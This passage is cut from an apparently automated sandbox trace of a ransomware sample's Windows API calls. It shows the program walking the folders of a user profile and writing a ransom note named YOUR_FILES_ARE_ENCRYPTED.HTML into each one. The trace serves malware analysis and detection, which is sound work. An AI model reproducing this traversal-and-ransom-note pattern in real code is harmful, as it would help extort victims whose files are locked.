cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\INetCookies\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 130 [0120.522] GetProcessHeap () returned 0x600000 [0120.522] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.522] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\INetCookies\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowsphone_8wekyb3d8bbwe\\ac\\inetcookies\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0120.523] WriteFile (in: hFile=0x324, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0120.524] CloseHandle (hObject=0x324) returned 1 [0120.524] GetProcessHeap () returned 0x600000 [0120.524] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.524] GetProcessHeap () returned 0x600000 [0120.524] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0120.524] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x107cc642, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x107cc642, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x107cc642, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f60c, dwReserved1=0x62f560, cFileName="INetHistory", cAlternateFileName="INETHI~1")) returned 1 [0120.524] StrStrIW (lpFirst="INetHistory", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.524] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\INetHistory") returned 100 [0120.524] GetProcessHeap () returned 0x600000 [0120.524] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0120.524] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\INetHistory" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\INetHistory") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\INetHistory" [0120.524] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\INetHistory", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\INetHistory\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\INetHistory\\*" [0120.524] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\INetHistory\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x107cc642, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x107cc642, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x107cc642, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da9d8, dwReserved1=0x62f568, cFileName=".", cAlternateFileName="")) returned 0x626838 [0120.525] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x107cc642, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x107cc642, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x107cc642, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da9d8, dwReserved1=0x62f568, cFileName="..", cAlternateFileName="")) returned 1 [0120.525] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x107cc642, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x107cc642, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x107cc642, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da9d8, dwReserved1=0x62f568, cFileName="..", cAlternateFileName="")) returned 0 [0120.525] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0120.525] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\INetHistory\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 130 [0120.525] GetProcessHeap () returned 0x600000 [0120.525] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.525] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\INetHistory\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowsphone_8wekyb3d8bbwe\\ac\\inethistory\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0120.525] WriteFile (in: hFile=0x324, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0120.526] CloseHandle (hObject=0x324) returned 1 [0120.526] GetProcessHeap () returned 0x600000 [0120.526] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.526] GetProcessHeap () returned 0x600000 [0120.526] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0120.526] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x107cc642, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x107cc642, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x107cc642, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f60c, dwReserved1=0x62f560, cFileName="Temp", cAlternateFileName="")) returned 1 [0120.526] StrStrIW (lpFirst="Temp", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.527] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\Temp") returned 93 [0120.527] GetProcessHeap () returned 0x600000 [0120.527] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0120.527] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\Temp" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\Temp") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\Temp" [0120.527] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\Temp", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\Temp\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\Temp\\*" [0120.527] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\Temp\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x107cc642, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x107cc642, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x107cc642, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da9d8, dwReserved1=0x62f568, cFileName=".", cAlternateFileName="")) returned 0x626638 [0120.527] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x107cc642, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x107cc642, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x107cc642, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da9d8, dwReserved1=0x62f568, cFileName="..", cAlternateFileName="")) returned 1 [0120.527] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x107cc642, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x107cc642, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x107cc642, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da9d8, dwReserved1=0x62f568, cFileName="..", cAlternateFileName="")) returned 0 [0120.527] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0120.527] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 123 [0120.527] GetProcessHeap () returned 0x600000 [0120.527] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.527] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowsphone_8wekyb3d8bbwe\\ac\\temp\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0120.528] WriteFile (in: hFile=0x324, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0120.529] CloseHandle (hObject=0x324) returned 1 [0120.529] GetProcessHeap () returned 0x600000 [0120.529] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.529] GetProcessHeap () returned 0x600000 [0120.529] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0120.529] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x107cc642, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x107cc642, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x107cc642, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f60c, dwReserved1=0x62f560, cFileName="Temp", cAlternateFileName="")) returned 0 [0120.529] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0120.529] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 118 [0120.529] GetProcessHeap () returned 0x600000 [0120.529] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.529] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowsphone_8wekyb3d8bbwe\\ac\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0120.530] WriteFile (in: hFile=0x320, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0120.531] CloseHandle (hObject=0x320) returned 1 [0120.531] GetProcessHeap () returned 0x600000 [0120.531] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.531] GetProcessHeap () returned 0x600000 [0120.531] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0120.532] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x10733eb1, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x10733eb1, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x10733eb1, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="AppData", cAlternateFileName="")) returned 1 [0120.532] StrStrIW (lpFirst="AppData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.532] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AppData") returned 93 [0120.532] GetProcessHeap () returned 0x600000 [0120.532] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0120.533] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AppData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AppData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AppData" [0120.533] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AppData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AppData\\*" [0120.533] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AppData\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x10733eb1, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x10733eb1, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x10733eb1, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f60c, dwReserved1=0x62f560, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0120.533] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x10733eb1, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x10733eb1, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x10733eb1, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f60c, dwReserved1=0x62f560, cFileName="..", cAlternateFileName="")) returned 1 [0120.534] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x10733eb1, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x10733eb1, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x10733eb1, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f60c, dwReserved1=0x62f560, cFileName="..", cAlternateFileName="")) returned 0 [0120.534] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0120.534] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 123 [0120.534] GetProcessHeap () returned 0x600000 [0120.534] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.534] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowsphone_8wekyb3d8bbwe\\appdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0120.534] WriteFile (in: hFile=0x320, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0120.535] CloseHandle (hObject=0x320) returned 1 [0120.535] GetProcessHeap () returned 0x600000 [0120.535] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.535] GetProcessHeap () returned 0x600000 [0120.535] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0120.535] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x106750eb, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x106750eb, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x106750eb, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="LocalCache", cAlternateFileName="LOCALC~1")) returned 1 [0120.535] StrStrIW (lpFirst="LocalCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.535] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\LocalCache") returned 96 [0120.535] GetProcessHeap () returned 0x600000 [0120.535] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0120.536] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\LocalCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\LocalCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\LocalCache" [0120.536] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\LocalCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\LocalCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\LocalCache\\*" [0120.536] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\LocalCache\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x106750eb, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x106750eb, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x106750eb, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f60c, dwReserved1=0x62f560, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0120.536] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x106750eb, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x106750eb, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x106750eb, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f60c, dwReserved1=0x62f560, cFileName="..", cAlternateFileName="")) returned 1 [0120.536] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x106750eb, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x106750eb, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x106750eb, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f60c, dwReserved1=0x62f560, cFileName="..", cAlternateFileName="")) returned 0 [0120.536] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0120.536] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\LocalCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 126 [0120.536] GetProcessHeap () returned 0x600000 [0120.536] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.536] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\LocalCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowsphone_8wekyb3d8bbwe\\localcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0120.537] WriteFile (in: hFile=0x320, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0120.538] CloseHandle (hObject=0x320) returned 1 [0120.538] GetProcessHeap () returned 0x600000 [0120.538] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.538] GetProcessHeap () returned 0x600000 [0120.538] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0120.538] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1064efd6, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x1064efd6, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x1064efd6, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="LocalState", cAlternateFileName="LOCALS~1")) returned 1 [0120.538] StrStrIW (lpFirst="LocalState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.538] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: 